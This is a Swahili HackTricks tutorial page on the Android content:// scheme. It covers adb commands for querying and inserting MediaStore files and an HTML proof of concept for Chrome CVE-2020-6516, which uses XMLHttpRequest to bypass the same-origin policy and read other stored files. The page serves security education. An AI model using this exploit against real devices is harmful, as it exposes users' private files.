content:// protocol

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Hii ni muhtasari wa chapisho https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/

Orodha ya Faili katika Hifadhi ya Media

Ili kuorodhesha faili zinazosimamiwa na Hifadhi ya Media, amri ifuatayo inaweza kutumika:

$ content query --uri content://media/external/file

Kwa matokeo yanayoeleweka zaidi na ya kirafiki kwa binadamu, onyesha tu kitambulisho na njia ya kila faili iliyohifadhiwa:

$ content query --uri content://media/external/file --projection _id,_data

Content providers wamejitosheleza katika eneo lao binafsi la jina. Upatikanaji wa mtoa huduma unahitaji URI maalum ya content://. Taarifa kuhusu njia za kupata mtoa huduma zinaweza kupatikana kutoka kwa mizizi ya maombi au msimbo wa chanzo wa Android.

Upatikanaji wa Chrome kwa Watoa Huduma wa Yaliyomo

Chrome kwenye Android inaweza kupata watoa huduma wa yaliyomo kupitia mpango wa content://, kuruhusu kupata rasilimali kama picha au nyaraka zilizosafirishwa na programu za watu wa tatu. Ili kufafanua hili, faili inaweza kuingizwa kwenye Hifadhi ya Vyombo vya Habari na kisha kupatikana kupitia Chrome:

Ingiza kuingia desturi kwenye Hifadhi ya Vyombo vya Habari:

cd /sdcard
echo "Hello, world!" > test.txt
content insert --uri content://media/external/file \
--bind _data:s:/storage/emulated/0/test.txt \
--bind mime_type:s:text/plain

Pata kitambulisho cha faili iliyowekwa hivi karibuni:

content query --uri content://media/external/file \
--projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt

Faili hiyo inaweza kisha kuonekana kwenye Chrome kwa kutumia URL iliyojengwa na kitambulisho cha faili.

Kwa mfano, kuorodhesha faili zinazohusiana na programu maalum:

content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>

Chrome CVE-2020-6516: Kupuuza Sera ya Asili-Sawa

Sera ya Asili-Sawa (SOP) ni itifaki ya usalama katika vivinjari ambayo inazuia kurasa za wavuti kuingiliana na rasilimali kutoka asili tofauti isipokuwa imeidhinishwa wazi na sera ya Kuvuka-Mwanzo-Mzazi (CORS). Sera hii inalenga kuzuia uvujaji wa habari na udanganyifu wa ombi la kurasa kati ya tovuti. Chrome inachukulia content:// kama mpango wa ndani, ikimaanisha sheria kali za SOP, ambapo kila URL ya mpango wa ndani inachukuliwa kama asili tofauti.

Hata hivyo, CVE-2020-6516 ilikuwa udhaifu katika Chrome ulioruhusu kupuuza sheria za SOP kwa rasilimali zilizopakiwa kupitia URL ya content://. Kwa athari, msimbo wa JavaScript kutoka URL ya content:// ulikuwa na uwezo wa kupata rasilimali nyingine zilizopakiwa kupitia URL za content://, ambayo ilikuwa wasiwasi mkubwa wa usalama, hasa kwenye vifaa vya Android vinavyotumia toleo kabla ya Android 10, ambapo uhifadhi uliolengwa haukuwa umetekelezwa.

Uthibitisho wa dhana hapo chini unaonyesha udhaifu huu, ambapo hati ya HTML, baada ya kupakiwa chini ya /sdcard na kuongezwa kwenye Hifadhi ya Vyombo vya Habari, inatumia XMLHttpRequest katika JavaScript yake kupata na kuonyesha maudhui ya faili nyingine kwenye Hifadhi ya Vyombo vya Habari, kwa kupuuza sheria za SOP.

Uthibitisho wa Dhana wa HTML:

<html>
<head>
<title>PoC</title>
<script type="text/javascript">
function poc()
{
var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function()
{
if(this.readyState == 4)
{
if(this.status == 200 || this.status == 0)
{
alert(xhr.response);
}
}
}

xhr.open("GET", "content://media/external/file/747");
xhr.send();
}
</script>
</head>
<body onload="poc()"></body>
</html>
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Last updated